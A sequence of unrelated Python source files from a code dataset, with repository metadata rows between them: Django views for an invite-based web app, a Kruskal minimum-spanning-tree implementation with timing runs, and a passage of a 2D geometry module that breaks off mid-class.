suiteCoreDamage = unittest.TestSuite(map(coreDamage, testcasesCoreDamage))
##########################################################
# Collect all test cases in this file
suites = [suiteCoreDamage]
suite = unittest.TestSuite(suites)
# Allow running this module directly.
if __name__ == "__main__":
    unittest.main()
UTF-8
Python
false
false
2,014
1,099,511,651,530
fc8c6fae45c386d157bb180a0714f750b1dd523b
be05189e4f2bf44f0c10c4b8280b82df2cd0557a
/front/views.py
8faf22c0a65b89f54ee347432c217822d997c98a
[]
no_license
TrevorFSmith/flapdoodle
https://github.com/TrevorFSmith/flapdoodle
bfb36d8ac88db47e69dd91806e73c47710b524fe
f2fecf7d4d08d529f563365e3354c1f57d71e07c
refs/heads/master
2021-03-24T10:11:20.621880
2009-07-20T23:15:49
2009-07-20T23:15:49
223,655
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import datetime
import calendar
import pprint
import traceback
from django.conf import settings
from django.db.models import Q
from django.template import Context, loader
from django.http import HttpResponse, Http404, HttpResponseServerError, HttpResponseRedirect, HttpResponsePermanentRedirect
from django.shortcuts import render_to_response, get_object_or_404
from django.contrib import auth
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from django.contrib.comments.models import Comment
from django.contrib.sites.models import Site
from django.utils.html import strip_tags
import django.contrib.contenttypes.models as content_type_models
from django.template import RequestContext
from django.core.cache import cache
from django.core.mail import send_mail
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from django.template.loader import render_to_string
from django.utils import feedgenerator
from django.core.urlresolvers import reverse
from person.models import InviteRequest, UserProfile
from person.forms import InviteRequestForm, UserCreationForm
from recaptcha.client.captcha import displayhtml as captcha_html
from twitter import Twitter
from models import *
from forms import *
def index(request):
    """Front page: authenticated users go to their own page; everyone
    else sees the landing page with an invite-request form."""
    if request.user.is_authenticated():
        return HttpResponseRedirect(reverse('front.views.user', kwargs={'username':request.user.username}))
    post_invite = False
    if request.method != 'POST':
        invite_request_form = InviteRequestForm()
    else:
        invite_request_form = InviteRequestForm(request.POST)
        if invite_request_form.is_valid():
            email = invite_request_form.cleaned_data['email']
            # Only record the first request for a given address.
            not_yet_requested = InviteRequest.objects.filter(email=email).count() == 0
            if not_yet_requested:
                invite_request_form.save()
                post_invite = True
    context = {
        'captcha_form': captcha_html(settings.RECAPTCHA_PUBLIC_KEY),
        'registration_form': UserCreationForm(),
        'invite_request_form': invite_request_form,
        'post_invite': post_invite,
    }
    return render_to_response('front/index.html', context, context_instance=RequestContext(request))
def tos(request):
    """Render the static terms-of-service page."""
    return render_to_response('front/tos.html', { }, context_instance=RequestContext(request))
def wtf(request):
    """Render the static what-is-this page."""
    return render_to_response('front/wtf.html', { }, context_instance=RequestContext(request))
def privacy(request):
    """Render the static privacy-policy page."""
    return render_to_response('front/privacy.html', { }, context_instance=RequestContext(request))
def user(request, username):
    """Profile page; the owner may POST an updated publishing suffix."""
    profile_user = get_object_or_404(User, username=username)
    owner_posting = request.method == 'POST' and request.user.username == profile_user.username
    if owner_posting:
        publishing_suffix_form = PublishingSuffixForm(request.POST)
        if request.POST.get('form_id', None) == 'publishing_suffix_form':
            if publishing_suffix_form.is_valid():
                PublishingSuffix.objects.set_suffix(profile_user, publishing_suffix_form.cleaned_data['suffix'])
            else:
                # Invalid input clears the stored suffix.
                PublishingSuffix.objects.set_suffix(profile_user, None)
    # Always hand the template a form pre-filled with the current suffix.
    publishing_suffix_form = PublishingSuffixForm(initial={'suffix':profile_user.publishing_suffix()})
    context = {
        'user': profile_user,
        'publishing_suffix_form': publishing_suffix_form,
        'phone_number': settings.TWILIO_PHONE_NUMBER,
        'twitter_account_form': TwitterAccountForm(),
    }
    return render_to_response('front/user.html', context, context_instance=RequestContext(request))
@login_required
def phones(request, username):
    """Phone-management page; users may only view their own."""
    owner = get_object_or_404(User, username=username)
    if owner.username != request.user.username:
        # Someone else's page: bounce the visitor to their own.
        return HttpResponseRedirect(reverse('front.views.phones', kwargs={'username':request.user.username}))
    context = { 'user':owner, 'phone_number':settings.TWILIO_PHONE_NUMBER }
    return render_to_response('front/phones.html', context, context_instance=RequestContext(request))
@login_required
def event(request, id):
    """Detail page for a single EventLine.

    Bug fix: removed the leftover debug statement `print dir(event_line)`
    that dumped the object's attribute list to stdout on every request.
    (`id` shadows the builtin but is part of the URLconf-facing signature,
    so the name is kept.)
    """
    event_line = get_object_or_404(EventLine, pk=id)
    return render_to_response('front/event.html', { 'event_line':event_line }, context_instance=RequestContext(request))
@login_required
def twitter(request, username):
    """Let a user attach default Twitter credentials to their account.

    Bug fixes:
    - the bound form (with any validation errors) is now passed to the
      template; the original always rendered a fresh unbound
      TwitterAccountForm(), so errors were never shown;
    - `logging` is imported locally because this module never imports it
      at the top, which made the success path raise NameError.
    """
    import logging
    user = get_object_or_404(User, username=username)
    if request.user.username != user.username:
        # Someone else's page: bounce the visitor to their own.
        return HttpResponseRedirect(reverse('front.views.twitter', kwargs={'username':request.user.username}))
    page_message = None
    if request.method == 'POST':
        twitter_account_form = TwitterAccountForm(request.POST)
        if twitter_account_form.is_valid():
            # Verify the credentials against Twitter before saving them.
            if TwitterAccount.objects.account_auths(twitter_account_form.cleaned_data['email'], twitter_account_form.cleaned_data['password']):
                ta = TwitterAccount.objects.save_as_default(user, twitter_account_form.cleaned_data['email'], twitter_account_form.cleaned_data['password'])
                logging.debug('Created a twitter account for %s: %s' % (user, ta))
                page_message = 'That Twitter account info checks out and has been saved.'
                twitter_account_form = TwitterAccountForm()
            else:
                page_message = 'I could not use that email and password to talk to Twitter.'
    else:
        twitter_account_form = TwitterAccountForm()
    return render_to_response('front/twitter.html', { 'user':user, 'twitter_account_form':twitter_account_form, 'page_message':page_message }, context_instance=RequestContext(request))
def update_your_browser(request):
    """Static page asking visitors to upgrade their browser."""
    return render_to_response('front/update_your_browser.html', { }, context_instance=RequestContext(request))
def recording(request, id):
    """Detail page for a single VoiceRecording."""
    voice_recording = get_object_or_404(VoiceRecording, pk=id)
    context = {'voice_recording':voice_recording}
    return render_to_response('front/recording.html', context, context_instance=RequestContext(request))
UTF-8
Python
false
false
2,009
4,767,413,746,121
3033b64f815887f1c048ea790f820c7a3e9414f6
c10ee4981c792cda2e348a1e7ba0ab22b6f70c2e
/special/kruskalClass.py
48af7536fe1213a42eb870bce9a99239189dfc17
[]
no_license
primalpop/641-Project
https://github.com/primalpop/641-Project
caf33723c5fc4541d826ff6c7d34256905251653
c3209ea7fd6841be31469b4c10efc78559121efb
refs/heads/master
2020-12-24T13:35:54.172308
2013-05-15T20:11:09
2013-05-15T20:11:09
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# N is the set of nodes {a,b,c..}
# A is the set of arcs with costs {(a,b,1),(a,c,2)..}
#
# Use: Kruskal(N,A)
import gen
import time
import math
class Kruskal:
    """Kruskal's minimum-spanning-tree algorithm.

    N is the set of nodes {a,b,c..}; A is the set of arcs with costs
    {(a,b,1),(a,c,2)..}. Components are tracked as an explicit list of
    node lists (no union-find), matching the original design.
    """

    def __init__(self, N, A):
        # Arcs in non-decreasing cost order; every node starts out in its
        # own singleton component.
        self.A = sorted(A, key=lambda arc: arc[2])
        self.N = N
        self.n = len(N)
        self.C = [[node] for node in self.N]
        self.T = []

    def execute(self):
        """Build and return the spanning tree as a list of (u, v) arcs."""
        for arc in self.A:
            u, v = arc[0], arc[1]
            ucomp, vcomp = self.find(u), self.find(v)
            if ucomp == vcomp:
                # Same component: this arc would close a cycle.
                continue
            self.merge(ucomp, vcomp)
            self.T.append((u, v))
            if len(self.T) == self.n - 1:
                break  # tree is complete
        return self.T

    def find(self, u):
        """Return (component_list, index) for the component holding u."""
        for idx, comp in enumerate(self.C):
            if u in comp:
                return (comp, idx)

    def merge(self, ucomp, vcomp):
        """Fuse two (component, index) pairs; merged list goes in front."""
        skip = (ucomp[1], vcomp[1])
        remaining = [comp for idx, comp in enumerate(self.C) if idx not in skip]
        self.C = [ucomp[0] + vcomp[0]] + remaining
# My experiment
# NOTE(review): Python 2 script (xrange, print statement); `gen` is a
# project-local topology generator, so this cannot run standalone.
# Measures Kruskal wall-clock time across 20 edge-density steps for a
# fixed 50-vertex graph and records the theoretical m*log(n) cost.
timings_vertices2 = []
theorotical2 = []
vertices = 50
import numpy
for nt in numpy.linspace(0.1, 0.95, 20):
    start = time.time()
    # Generate an adjacency matrix with density nt.
    A = gen.topology(vertices,nt)
    N = list(xrange(len(A)))
    p = []
    # Collect lower-triangle nonzero entries as (i, j, weight) arcs.
    for i in xrange(1,len(A)):
        for j in xrange(1,i):
            if A[i][j] != 0:
                p.append((i,j,A[i][j]))
    myExperiment = Kruskal(N, p)
    myExperiment.execute()
    end = time.time()
    t = end - start
    timings_vertices2.append(t)
    theorotical2.append(len(p)*math.log(vertices))
    print t,len(p), vertices
#!/usr/bin/env python3
#-*- coding:utf-8 -*-
"""
Very basic 2D abstract geometry package. It defines these geometrical
constructs:
* `GeometricObject` - abstract base class, not meant to be used
directly
* `Point`
* `Vector`
* `BoundingBox`
* `Line`
* `Ray`
* `Segment`
* `Polygon`
* ...for now
Notes
-----
Except for the `Point` and `Vector` classes which will be discussed below, all
of the other classes define a `__getitem__` method that can be used to retrieve
the points defining the `GeometricObject` by indices.
The `Point` class defines the `__getitem__` method in a separate way,
i.e. it returns the Cartesian coordinates of the `Point` by indices.
The `Vector` class does the same except it returns the x & y Cartesian
coordinates in this case.
"""
# system modules
import math
import random
# user defined module
import geo2d_utils as u
# acceptable uncertainty for calculating intersections and such
UNCERTAINTY = 1e-5
def get_perpendicular_to(obj, at_point=None):
    """
    Build a `Vector` (or, with `at_point`, a `Line`) perpendicular to
    `obj`.

    Parameters
    ----------
    obj : vector or line-like
        The object to compute the perpendicular for; for a `Line`, its
        directional vector is used.
    at_point : point-like, optional
        When given, the result is instead the `Line` through `at_point`
        perpendicular to `obj`.

    Returns
    -------
    out : vector or line
        The perpendicular `Vector`, or the perpendicular `Line` through
        `at_point` when that argument is supplied.

    Raises
    ------
    TypeError
        If `obj` is not a `Vector` or `Line`-like, or `at_point` is given
        but not point-like.
    """
    if not isinstance(obj, (Vector, Line)):
        raise TypeError('Expected vector or line-like, but got: '
                        '{0} instead.'.format(obj))
    if at_point is not None and not Point.is_point_like(at_point):
        raise TypeError('Expected point-like, but got: '
                        '{0} instead.'.format(at_point))
    # For a Line-like argument, work with its directional vector.
    direction = obj.v if isinstance(obj, Line) else obj
    # Rotate the direction a quarter turn to obtain the normal direction.
    normal = Vector(1, direction.phi + math.pi/2, coordinates='polar')
    if Point.is_point_like(at_point):
        # Return the perpendicular Line through the requested point.
        return Line(at_point, normal)
    return normal
class GeometricObject(object):
    """
    Abstract geometric object class.
    It's not meant to be used directly. This only implements methods that
    are called on other objects.
    """
    def __str__(self, **kwargs):
        # Subclasses forward their fields as kwargs, producing e.g.
        # "Point({'x': 1.0, 'y': 2.0})".
        return '{0}({1})'.format(type(self).__name__, kwargs)
    def __contains__(self, x):
        """
        Searches for x in "itself". If we're talking about a `Point`
        or a `Vector` then this searches within their components (x,
        y). For everything else it searches within the list of points
        (vertices).
        Parameters
        ----------
        x : {point, scalar}
            The object to search for.
        Returns
        -------
        out : {True, False}
            `True` if we find `x` in `self`, else `False`.
        """
        # Relies on the subclass's __getitem__/__iter__ and its items'
        # __eq__; stops at the first match.
        try:
            next(i for i in self if i == x)
            return True
        except StopIteration:
            return False
    def intersection(self, obj):
        """
        Return points of intersection if any.
        This method just calls the intersection method on the other objects
        that have it implemented.
        Parameters
        ----------
        obj : geometric object
            `obj` is any object that has intersection implemented.
        Returns
        -------
        ret : {point, None}
            The point of intersection if any, if not, just `None`.
        """
        # Double-dispatch: delegate to the argument's implementation.
        return obj.intersection(self)
    def translate(self, dx, dy):
        """
        Translate `self` by given amounts on x and y.
        Parameters
        ----------
        dx, dy : scalar
            Amount to translate (relative movement).
        """
        if isinstance(self, Polygon):
            # we don't want to include the last point since that's also the
            # first point and if we were to translate it, it would end up being
            # translated two times
            sl = slice(0, -1)
        else:
            sl = slice(None)
        # Translate each vertex in place.
        for p in self[sl]:
            p.translate(dx, dy)
    def rotate(self, theta, point=None, angle='degrees'):
        """
        Rotate `self` around pivot `point`.
        Parameters
        ----------
        theta : scalar
            The angle to be rotated by.
        point : {point-like}, optional
            If given this will be used as the rotation pivot.
        angle : {'degrees', 'radians'}, optional
            This tells the function how `theta` is passed: as degrees or as
            radians. Default is degrees.
        """
        polygon_list = None
        if isinstance(self, Polygon):
            # we don't want to include the last point since that's also the
            # first point and if we were to rotate it, it would end up being
            # rotated two times
            sl = slice(0, -1)
            # we are going to create a new Polygon actually after rotation
            # since it's much easier to do it this way
            polygon_list = []
        else:
            sl = slice(None)
        for p in self[sl]:
            # rotate each individual point
            p.rotate(theta, point, angle)
            if polygon_list is not None:
                polygon_list.append(p)
        if polygon_list:
            # in the case of Polygon we build a new rotated one
            # NOTE(review): this rebinds the local name `self` only — the
            # caller's object is unaffected by this assignment (its points
            # were already rotated in place above). Verify whether Polygon
            # reconstruction was meant to refresh derived state.
            self = Polygon(polygon_list)
        else:
            # in case of other GeometricObjects
            # Refresh the cached directional unit vector; assumes self has
            # p1/p2 endpoints (Line-like) — TODO confirm for all users.
            self._v = Vector(self.p1, self.p2).normalized
        # reset former cached values in self
        if hasattr(self, '_cached'):
            self._cached = {}
class Point(GeometricObject):
"""
An abstract mathematical point.
It can be built by passing no parameters to the constructor,
this way having the origin coordinates `(0, 0)`, or by passing
a `Point`, a `tuple` or a `list` of length two
or even two scalar values.
Parameters
----------
*args : {two scalars, point-like}, optional
`Point`-like means that it can be either of `tuple` or `list`
of length 2 (see ~`Point.is_point_like`).
Raises
------
TypeError
If the arguments are not the correct type (`Point`, list,
tuple -of length 2- or two values) a `TypeError` is raised.
"""
def __init__(self, *args):
if len(args) == 0:
self._x = 0.
self._y = 0.
elif len(args) == 1:
arg = args[0]
if Point.is_point_like(arg):
self._x = float(arg[0])
self._y = float(arg[1])
if isinstance(arg, Vector):
self._x = arg.x
self._y = arg.y
elif len(args) == 2:
self._x = float(args[0])
self._y = float(args[1])
else:
raise TypeError('The construct needs no arguments, '
'Point, list, tuple (of length 2) or two '
'values, but got instead: {0}'.format(args))
    @property
    def x(self):
        """[scalar] Get the `x` coordinate."""
        # Read-only: coordinates are fixed at construction time.
        return self._x
    @property
    def y(self):
        """[scalar] Get the `y` coordinate."""
        # Read-only: coordinates are fixed at construction time.
        return self._y
    def __str__(self):
        # Delegates to GeometricObject.__str__, yielding "Point({...})".
        return super(Point, self).__str__(x=self.x, y=self.y)
def __getitem__(self, idx):
"""
Return values as a `list` for easier acces.
"""
return (self.x, self.y)[idx]
    def __len__(self):
        """
        The length of a `Point` object is 2.
        """
        # Always exactly two components: (x, y).
        return 2
def __eq__(self, point):
"""
Equality (==) operator for two points.
Parameters
----------
point : {point-like}
The point to test against.
Returns
-------
res : {True, False}
If the `x` and `y` components of the points are equal then return
`True`, else `False`.
Raises
------
TypeError
In case something other than `Point`-like is given.
"""
if Point.is_point_like(point):
return abs(self.x - point[0]) < UNCERTAINTY and \
abs(self.y - point[1]) < UNCERTAINTY
return False
def __lt__(self, point):
"""
Less than (<) operator for two points.
Parameters
----------
point : {point-like}
The point to test against.
Returns
-------
res : {True, False}
This operator returns `True` if:
1. `self.y` < `point.y`
2. in the borderline case `self.y` == `point.y` then if `self.x` <
`point.x`
Otherwise it returns `False`.
"""
if self.y < point[1]:
return True
if self.y > point[1]:
return False
if self.x < point[0]:
return True
return False
@staticmethod
def is_point_like(obj):
"""
See if `obj` is of `Point`-like.
`Point`-like means `Point` or a list or tuple of
length 2.
Parameters
----------
obj : geometric object
Returns
-------
out : {True, False}
`True` if obj is `Point`-like, else `False`.
"""
if isinstance(obj, Point):
return True
if isinstance(obj, (tuple, list)) and len(obj) == 2:
return True
return False
def is_left(self, obj):
"""
Determine if `self` is left|on|right of an infinite `Line` or
`Point`.
Parameters
----------
obj : {point-like, line-like}
The `GeometricObject` to test against.
Returns
-------
out : {scalar, `None`}
>0 if `self` is left of `Line`,
=0 if `self` is on of `Line`,
<0 if `self` is right of `Line`,
Raises
------
ValueError
In case something else than a `Line`-like or
`Point`-like is given.
"""
if Line.is_line_like(obj):
return ((obj[1][0] - obj[0][0]) * (self.y - obj[0][1]) - \
(self.x - obj[0][0]) * (obj[1][1] - obj[0][1]))
if Point.is_point_like(obj):
return obj[0] - self.x
raise ValueError('Expected a Line or Point, but got: {}'
.format(obj))
    def distance_to(self, obj):
        """
        Calculate the distance to another `GeometricObject`.

        Parameters
        ----------
        obj : {point-like, Line (incl. Ray/Segment)}
            The object for which to calculate the distance to.

        Returns
        -------
        out : float
            Euclidean distance to a point-like, or perpendicular distance
            to the infinite line supporting a `Line`-like object.
            NOTE(review): contrary to the old docstring, no intersection
            `Point` is returned, and for unsupported types the method
            silently falls through returning `None` -- confirm callers
            rely on this.
        """
        if Point.is_point_like(obj):
            # plain Euclidean distance
            return ((self.x - obj[0])**2 + (self.y - obj[1])**2)**(.5)
        if isinstance(obj, Line):
            # get_perpendicular_to is defined elsewhere in this module;
            # presumably it returns a unit vector perpendicular to obj --
            # the projection below relies on it being normalized (verify)
            perpendicular = get_perpendicular_to(obj)
            distance_to = abs(perpendicular.x*(self.x - obj.p1.x) + \
                              perpendicular.y*(self.y - obj.p1.y))
            return distance_to
    def belongs_to(self, obj):
        """
        Check if the `Point` is part of a `GeometricObject`.

        Delegates to ``obj.has(self)``, so `obj` must implement `has`.

        Returns
        -------
        out : {True, False}
        """
        return obj.has(self)
def translate(self, dx, dy):
"""
See `GeometricObject.translate`.
"""
self._x += dx
self._y += dy
def move(self, x, y):
"""
The difference between this and `translate` is that this
function moves `self` to the given coordinates instead.
"""
self._x = x
self._y = y
def rotate(self, theta, point=None, angle='degrees'):
"""
Rotate `self` by angle theta.
Parameters
----------
theta : scalar
Angle to rotate by. Default in radians (see `angle`).
point : {None, point-like}, optional
Pivot point to rotate against (instead of origin). If not given,
the point will be rotated against origin.
angle : {'radians', 'degrees'}, optional
How is `theta` passed? in radians or degrees.
"""
if angle == 'degrees':
theta = math.radians(theta)
if point is None:
x_new = math.cos(theta) * self.x - math.sin(theta) * self.y
y_new = math.sin(theta) * self.x + math.cos(theta) * self.y
else:
point = Point(point)
x_new = math.cos(theta) * (self.x - point.x) - math.sin(theta) * \
(self.y - point.y) + point.x
y_new = math.sin(theta) * (self.x - point.x) + math.cos(theta) * \
(self.y - point.y) + point.y
self._x = x_new
self._y = y_new
class Vector(GeometricObject):
    """
    An abstract `Vector` object.

    It's defined by `x`, `y` components or `rho` (length) and `phi` (angle
    relative to the X axis, in radians).

    Parameters
    ----------
    *args : {two scalars, vector, point, (list, tuple of length 2)}
        Given `coordinates`, `args` compose the vector components. If the
        Cartesian coordinates are given, the Polar ones are calculated and
        vice-versa. If `args` is of `Vector` type a copy is made and every
        other argument is ignored. It can also be `Point`-like: with two
        `Point`-like arguments the vector has `rho` equal to the distance
        between the two points and the direction args[0] -> args[1]; with
        a single `Point`-like its `x`/`y` values are used (direction
        ``Point(0, 0)`` -> ``Point(x, y)``).
    **kwargs : coordinates={"cartesian", "polar"}, optional
        If `cartesian` then `arg1` is the `x` and `arg2` the `y`
        component; if `polar` then `arg1` is `rho` and `arg2` is `phi`
        (in radians).

    Raises
    ------
    TypeError
        In case `args` is not the correct type (`Vector`, two scalars
        or point-like).
    ValueError
        If `coordinates` is neither ``'cartesian'`` nor ``'polar'``.
    """
    def __init__(self, *args, **kwargs):
        coordinates = kwargs.get('coordinates', 'cartesian')
        if len(args) == 1:
            arg = args[0]
            if isinstance(arg, Vector):
                # copy constructor: both coordinate systems already known
                self._x = arg.x
                self._y = arg.y
                self._rho = arg.rho
                self._phi = arg.phi
            elif Point.is_point_like(arg):
                # direction Point(0, 0) -> arg
                self._x = arg[0]
                self._y = arg[1]
                self._calculate_polar_coords()
            else:
                # BUG FIX: an unrecognized single argument used to be
                # silently ignored, leaving the instance uninitialized
                raise TypeError('The constructor needs vector, point-like '
                                'or two numbers, but instead it was '
                                'given: {0}'.format(args))
        elif len(args) == 2:
            if Point.is_point_like(args[0]) and Point.is_point_like(args[1]):
                # vector from args[0] to args[1]
                self._x = args[1][0] - args[0][0]
                self._y = args[1][1] - args[0][1]
                self._calculate_polar_coords()
                return
            # BUG FIX: the original used `coordinates is 'cartesian'`,
            # i.e. string identity, which only works thanks to CPython
            # string interning; compare with == instead
            if coordinates == 'cartesian':
                self._x = args[0]
                self._y = args[1]
                self._calculate_polar_coords()
            elif coordinates == 'polar':
                self._rho = args[0]
                self._phi = u.float_to_2pi(args[1])
                self._calculate_cartesian_coords()
            else:
                # previously an unknown coordinate system silently left
                # the instance uninitialized
                raise ValueError("coordinates must be 'cartesian' or "
                                 "'polar', but got: {0}".format(coordinates))
        else:
            raise TypeError('The constructor needs vector, point-like or '
                            'two numbers, but instead it was given: '
                            '{0}'.format(args))

    @property
    def x(self):
        """[scalar] Get the x component of the `Vector`."""
        return self._x

    @property
    def y(self):
        """[scalar] Get the y component of the `Vector`."""
        return self._y

    @property
    def rho(self):
        """[scalar] Get the length of the `Vector` (polar coordinates)."""
        return self._rho

    @property
    def phi(self):
        """
        [scalar] Get the angle (radians).

        Get the angle (in radians) of the `Vector` with the X axis
        (polar coordinates). `phi` is always mapped to ``[0, 2PI)``.
        """
        return self._phi

    @u.cached_property
    def normalized(self):
        """
        [Vector] Get a normalized copy of `self` (unit length, same
        direction).

        NOTE(review): the value is cached on first access and is not
        invalidated by `rotate` -- confirm `u.cached_property` semantics.
        """
        return Vector(1, self.phi, coordinates='polar')

    def __str__(self):
        return super(Vector, self).__str__(x=self.x, y=self.y, rho=self.rho,
                                           phi=math.degrees(self.phi))

    def __getitem__(self, idx):
        """Index access: ``v[0]`` is `x`, ``v[1]`` is `y`."""
        return (self.x, self.y)[idx]

    def __len__(self):
        """A `Vector` has exactly 2 (Cartesian) components."""
        return 2

    def __neg__(self):
        """
        Return a new `Vector` pointing in the opposite direction
        (same `rho`, angle shifted by PI).
        """
        return Vector(-self.x, -self.y)

    def __mul__(self, arg):
        """
        Dot product with another `Vector`, or multiplication by a
        scalar. For details see `dot`.
        """
        return self.dot(arg)

    def __add__(self, vector):
        """
        Add two vectors component-wise.

        Parameters
        ----------
        vector : vector
            The vector to be added to `self`.

        Returns
        -------
        out : vector
            A new vector ``(self.x + vector.x, self.y + vector.y)``.
        """
        return Vector(self.x + vector.x, self.y + vector.y)

    def __sub__(self, vector):
        """
        Subtract two vectors; implemented as ``self + (-vector)``.
        """
        return self.__add__(-vector)

    def _calculate_polar_coords(self):
        """
        Internal helper: derive `rho` and `phi` from `x` and `y`.
        """
        # the length of the vector is the distance from origin to (x, y)
        self._rho = Point(0, 0).distance_to(Point(self.x, self.y))
        # angle with the X axis, mapped from atan2's (-PI, PI] to [0, 2PI)
        self._phi = math.atan2(self.y, self.x)
        if self.phi < 0:
            self._phi += 2*math.pi

    def _calculate_cartesian_coords(self):
        """
        Internal helper: derive `x` and `y` from `rho` and `phi`.
        (The old docstring claimed a ValueError that was never raised.)
        """
        self._x = self.rho * math.cos(self.phi)
        self._y = self.rho * math.sin(self.phi)

    @staticmethod
    def random_direction():
        """
        Create a unit-length `Vector` with a random `phi` in the
        interval ``[0, PI)`` (i.e. pointing into the upper half plane).

        Returns
        -------
        out : vector
        """
        return Vector(1, random.random()*math.pi, coordinates='polar')

    def dot(self, arg):
        """
        Dot product with another `Vector`, or multiplication by a
        scalar.

        Parameters
        ----------
        arg : {scalar, vector}
            A number to scale `self` by, or another `Vector` for the
            dot product.

        Returns
        -------
        res : {float, vector}
            The scalar dot product, or a new scaled `Vector`.

        Raises
        ------
        TypeError
            In case `arg` is neither a number nor a `Vector`.
        """
        if isinstance(arg, Vector):
            # dot product
            return self.x * arg.x + self.y * arg.y
        elif isinstance(arg, (int, float)):
            # scaling by a number
            return Vector(self.x * arg, self.y * arg)
        # BUG FIX: the message had no placeholder, so `arg` never showed up
        raise TypeError('Expected a vector or number, but got '
                        '{0}'.format(arg))

    def cross(self, arg):
        """
        2D "cross product" with another `Vector`: the scalar
        ``self.x*arg.y - self.y*arg.x`` (not a vector as in 3D).

        Parameters
        ----------
        arg : vector

        Returns
        -------
        res : float

        Raises
        ------
        TypeError
            In case `arg` is not a `Vector`.
        """
        if isinstance(arg, Vector):
            return self.x * arg.y - self.y * arg.x
        # BUG FIX: the message had no placeholder, so `arg` never showed up
        raise TypeError('Expected a vector, but got {0}'.format(arg))

    def parallel_to(self, obj):
        """
        Is `self` parallel with `obj` (`Vector` or `Line`-like)?

        Uses the geometric interpretation of the 2D cross product: two
        vectors are parallel when it is (nearly) zero.

        Returns
        -------
        res : {True, False}
        """
        if isinstance(obj, Line):
            obj = obj.v
        return abs(self.cross(obj)) < UNCERTAINTY

    def perpendicular_to(self, obj):
        """
        Is `self` perpendicular to `obj` (`Vector` or `Line`)?

        True when the dot product between the two vectors is 0.

        Returns
        -------
        res : {True, False}
        """
        if isinstance(obj, Line):
            obj = obj.v
        return self * obj == 0

    def translate(*args):
        """No-op: translating a free `Vector` makes no sense."""
        pass

    def rotate(self, theta, angle='degrees'):
        """
        Rotate `self` in place by `theta`.

        Parameters
        ----------
        theta : scalar
            Angle by which to rotate.
        angle : {'degrees', 'radians'}, optional
            Specifies how `theta` is given. Default is degrees.
        """
        if angle == 'degrees':
            theta = math.radians(theta)
        # BUG FIX: `self.phi += theta` tried to assign to the read-only
        # `phi` property and raised AttributeError on every call; update
        # the backing field instead and keep phi mapped to [0, 2PI) the
        # same way the constructor does
        self._phi = u.float_to_2pi(self._phi + theta)
        self._calculate_cartesian_coords()
class BoundingBox(GeometricObject):
    """
    Represents the far extremities of another `GeometricObject`
    (except for `Vector`).

    It is totally defined by two points. For convenience it also has
    `left`, `top`, `right` and `bottom` attributes.

    Parameters
    ----------
    obj : geometric object
        The object for which to compute the `BoundingBox`; it must be
        iterable over `Point`s (e.g. `Segment`, `Polygon`).

    Raises
    ------
    TypeError
        If `obj` is not a `GeometricObject`, or is a `Vector`.
    """
    def __init__(self, obj):
        if not isinstance(obj, GeometricObject) or isinstance(obj, Vector):
            raise TypeError('The argument must be of type GeometricObject '
                            '(except for Vector), but got {} instead'
                            .format(obj))
        # collect the coordinate extremes over all of obj's points
        xs = [point.x for point in obj]
        ys = [point.y for point in obj]
        self._left = min(xs)
        self._top = max(ys)
        self._right = max(xs)
        self._bottom = min(ys)
        # BUG FIX: the corner points were built with swapped coordinates
        # (Point(bottom, left) / Point(top, right)); p1 is documented as
        # the bottom-left corner, i.e. (x=left, y=bottom), and p2 as the
        # top-right corner, i.e. (x=right, y=top)
        self._p1 = Point(self.left, self.bottom)
        self._p2 = Point(self.right, self.top)
        self._width = abs(self.right - self.left)
        self._height = abs(self.top - self.bottom)

    @property
    def left(self):
        """[scalar] Smallest x over the object's points."""
        return self._left

    @property
    def top(self):
        """[scalar] Largest y over the object's points."""
        return self._top

    @property
    def right(self):
        """[scalar] Largest x over the object's points."""
        return self._right

    @property
    def bottom(self):
        """[scalar] Smallest y over the object's points."""
        return self._bottom

    @property
    def p1(self):
        """
        (point-like) Get the bottom-left `Point`.
        """
        return self._p1

    @property
    def p2(self):
        """
        (point-like) Get the top-right `Point`.
        """
        return self._p2

    @property
    def width(self):
        """[scalar] Horizontal extent (right - left)."""
        return self._width

    @property
    def height(self):
        """[scalar] Vertical extent (top - bottom)."""
        return self._height

    def __str__(self):
        return super(BoundingBox, self).__str__(left=self.left, top=self.top,
                                                right=self.right,
                                                bottom=self.bottom,
                                                p1=str(self.p1),
                                                p2=str(self.p2))

    def __getitem__(self, idx):
        """
        Get the two corner points by index: 0 -> `p1`, 1 -> `p2`.

        Returns
        -------
        out : point
        """
        return (self.p1, self.p2)[idx]

    def __len__(self):
        """
        The `BoundingBox` is made of 2 points so its length is 2.
        """
        return 2
class Line(GeometricObject):
    """
    An abstract mathematical `Line`.

    It is defined by either two points or by a `Point` and a
    `Vector`.

    Parameters
    ----------
    arg1 : point-like
        The passed in parameters can be either two points or a `Point`
        and a `Vector`. For more on `Point`-like see the
        `Point` class.
    arg2 : {point-like, vector}
        If a `Vector` is given as `arg2` instead of a
        `Point`-like, then `p2` will be calculated for t = 1 in the
        vectorial definition of the line (see notes).

    See Also
    --------
    Point, Vector

    Notes
    -----
    The vectorial definition is used: ``r = r0 + t * v`` where ``t`` is a
    parameter, ``r0`` is `p1` and ``v`` is the normalized direction vector
    from `p1` to `p2` (computed when two points are given).
    """
    def __init__(self, arg1, arg2):
        if Point.is_point_like(arg1) and Point.is_point_like(arg2):
            # two point-likes: store them and derive the unit direction
            self._p1, self._p2 = Point(arg1), Point(arg2)
            self._v = Vector(self.p1, self.p2).normalized
        else:
            # a Point and a Vector: derive p2 for t = 1 along the
            # normalized direction
            self._p1, self._v = Point(arg1), arg2.normalized
            self._p2 = Point(self.p1.x + self.v.x, self.p1.y + self.v.y)

    @property
    def p1(self):
        """
        [point] Get the 1st `Point` that defines the `Line`.
        """
        return self._p1

    @property
    def p2(self):
        """
        [point] Get the 2nd `Point` that defines the `Line`.
        """
        return self._p2

    @property
    def v(self):
        """
        [vector] Get the unit `Vector` pointing from `self.p1` to
        `self.p2`.
        """
        return self._v

    @property
    def phi(self):
        """
        [scalar] Get `self.v.phi`. Convenience shortcut.
        """
        return self.v.phi

    def __str__(self, **kwargs):
        return super(Line, self).__str__(v=str(self.v),
                                         p1=str(self.p1), p2=str(self.p2),
                                         **kwargs)

    def __getitem__(self, idx):
        """
        Index access to the defining points: 0 -> `p1`, 1 -> `p2`.

        Returns
        -------
        ret : point
        """
        return (self.p1, self.p2)[idx]

    def __len__(self):
